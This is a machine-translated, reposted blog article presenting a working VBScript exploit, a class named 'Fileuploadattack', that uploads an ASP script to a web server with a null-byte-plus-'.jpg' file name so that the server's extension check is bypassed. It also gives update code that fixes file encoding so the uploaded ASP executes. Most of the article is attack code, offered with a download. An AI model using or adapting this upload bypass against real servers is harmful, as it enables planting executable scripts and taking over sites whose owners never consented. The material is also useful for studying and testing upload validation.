ASP upload vulnerability using CHR (0) bypass the extension detection script _ Application Techniques

Source: Internet
Author: User
Tags chr gettext sendfile

Today Demon mentioned this issue, just to think of an article previously seen "Automatic file upload using Ie+ado without user interaction-vbsscript." This article gives an example of a local no interactive automatic upload script that can be borrowed today. The original script took advantage of the internetexplorer.application component, I rewrote it and implemented a similar function with winhttp.winhttprequest.5.1, for more use of this component please refer to the WinHttpRequest Object Reference ".

Copy Code code as follows:

Option Explicit

Function file_get_contents (filename)
Dim FSO, F
Set FSO = WSH. CreateObject ("Scripting.FileSystemObject")
Set f = fso. OpenTextFile (filename, 1)
file_get_contents = F.readall
F.close
Set F = Nothing
Set FSO = Nothing
End Function

' Code modified from http://www.motobit.com/tips/detpg_uploadvbsie/
Class Fileuploadattack
Private m_objwinhttp
Private m_strURL
Private M_strfieldname

Private Sub Class_Initialize ()
Set m_objwinhttp = WSH. CreateObject (_
"winhttp.winhttprequest.5.1")
End Sub

Private Sub Class_Terminate ()
Set m_objwinhttp = Nothing
End Sub

Public Sub seturl (URL)
m_strURL = URL
End Sub

Public Sub setfieldname (name)
M_strfieldname = Name
End Sub

' Infrormations in form field header.
Function Mpfields (FieldName, FileName, ContentType)
Dim mptemplate ' template for multipart header
Mptemplate = "Content-disposition:form-data; Name= "" {field} ""; "+ _
"Filename=" "{file}" "" + VbCrLf + _
"Content-type: {ct}" + vbCrLf + vbCrLf
Dim out
out = Replace (Mptemplate, "{field}", FieldName)
out = Replace (out, "{file}", FileName)
Mpfields = Replace (out, "{ct}", ContentType)
End Function
' Converts OLE string to multibyte string
Function Stringtomb (S)
Dim I, B
For I = 1 to Len (S)
B = B & ChrB (ASC (S, I, 1))
Next
Stringtomb = B
End Function

' Build multipart/form-data document with file contents and header info
Function Buildformdata (filecontents, boundary, _
FileName, FieldName)
Dim FormData, Pre, Po
Const ContentType = "Application/upload"

' The two parts around file contents in the Multipart-form data.
Pre = "--" + boundary + vbCrLf + mpfields (FieldName, _
FileName, ContentType)
Po = vbCrLf + "--" + Boundary + "--" + vbCrLf

' Build form data using recordset binary field
Const Adlongvarbinary = 205
Dim rs:set RS = WSH. CreateObject ("ADODB.") Recordset ")
Rs. Fields.Append "B", Adlongvarbinary, _
Len (Pre) + LenB (filecontents) + len (Po)
Rs. Open
Rs. AddNew
Dim Lendata
' Convert Pre string value to a binary data
Lendata = Len (Pre)
RS ("B"). AppendChunk (Stringtomb (Pre) & ChrB (0))
Pre = RS ("B"). GetChunk (Lendata)
RS ("b") = ""

' Convert Po string value to a binary data
Lendata = Len (Po)
RS ("B"). AppendChunk (Stringtomb (Po) & ChrB (0))
Po = RS ("B"). GetChunk (Lendata)
RS ("b") = ""

' Join Pre + filecontents + Po binary data
RS ("B"). AppendChunk (Pre)
RS ("B"). AppendChunk (filecontents)
RS ("B"). AppendChunk (Po)
Rs. Update
FormData = RS ("b")
Rs. Close
Buildformdata = FormData
End Function


Public Function sendFile (fileName)
Const boundary = "---------------------------0123456789012"
M_objwinhttp.open "POST", m_strURL, False
M_objwinhttp.setrequestheader "Content-type", _
"Multipart/form-data; boundary= "+ Boundary

Dim FileContents, FormData
' Get source file as a binary data.
FileContents = file_get_contents (FileName)

' The malicious file name extension chr (0) & jpg is constructed below.
' Build Multipart/form-data Document
FormData = Buildformdata (filecontents, boundary, _
FileName & Chr (0) & ". jpg", m_strfieldname)

M_objwinhttp.send FormData
SendFile = M_objwinhttp.status
End Function

Public Function GetText ()
GetText = M_objwinhttp.responsetext
End Function
End Class

Function VBMain ()
VBMain = 0

Dim FileUpload
Set fileupload = New fileuploadattack
' Need to modify the content below as appropriate
' Upload URL
Fileupload.seturl "Http://localhost/upload/uploadfile.asp"
Fileupload.setfieldname "filepath" upload the name of the form box
' Upload file path required
If fileupload.sendfile ("E:\projects\asp\index.asp") =200 Then
MsgBox "Upload Success" & Fileupload.gettext ()
Else
MsgBox "Failure"
End If
Set FileUpload = Nothing
End Function

Call Wscript.Quit (VBMain ())

The upload function is casually on the internet to find a simple upload ASP file, and then join me in the article "Asp/vbscript in Chr (0) and the origin of the security issues" described in the Getfileextensionname to determine whether the extension is JPG.

Test results are: Manually upload ASP, failed to upload ASP files using the above attack script, success! In the upload directory is really ASP file, through the browser URL can also access this ASP file, but it is strange to show a blank, I am here IIS 7, is the IIS version of the problem, perhaps file_get_contents should return the file binary stream? Well, here's the question, and there's something else, let's go.

All experimental code packs, here upload.zip (Code bug reference below update instructions) download.

Updated December 25, 2011

According to everyone feedback upload file into Unicode Little endian coding problem, first of all sorry is really lazy, the main code reference to the foreigner, and the foreigner explained a bit getfile this function to get file binary data, did not find this function implementation, Too lazy to get binary read, directly to get a file_get_contents to obtain text data, it turns out that there is a problem, the following I take remedial measures to explain it, or lazy, directly on the existing basis of the text data into binary data. Using the ADODB.stream component, the function is as follows:

Copy Code code as follows:

' Converts the string str of the specified charset to binary
Function Strtobin (str, CharSet)
With WSH. CreateObject ("ADODB.") Stream ")
. Type = 2
. Mode = 3
. Open
. Charset = Charset
. WRITETEXT Str
. Flush
. Position = 0
. Type = 1

Strtobin =. Read ()
. Close
End With
End Function

Then change line 106th of the above code to read as follows (reading text in ASCII):

Copy Code code as follows:

FileContents = Strtobin (file_get_contents (FileName), "ASCII")

This change after the upload of the ASP file is a common encoded file, and then the browser access to this file, you can see that the ASP was successfully resolved.

But here is a bit verbose, in fact, you can open the file directly in binary and return data, here two steps: 1. Read the file as text; 2. Converts text to binary data. One-Step's code can refer to the following function that reads file data in binary byte ():

Copy Code code as follows:

' Returns file contents as a binary data
Function GetFile (FileName)
Dim Stream:set Stream = CreateObject ("ADODB.") Stream ")
Stream.type = 1 ' Binary
Stream.open
Stream.loadfromfile FileName
GetFile = Stream.read
Stream.Close
Set Stream = Nothing
End Function

More optimized code I will not write, the main description is an upload idea, if you want to get a perfect upload implementation, you can refer to Demon's "VBS simulation post upload file."
Original: http://www.jb51.net/article/26103.htm

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.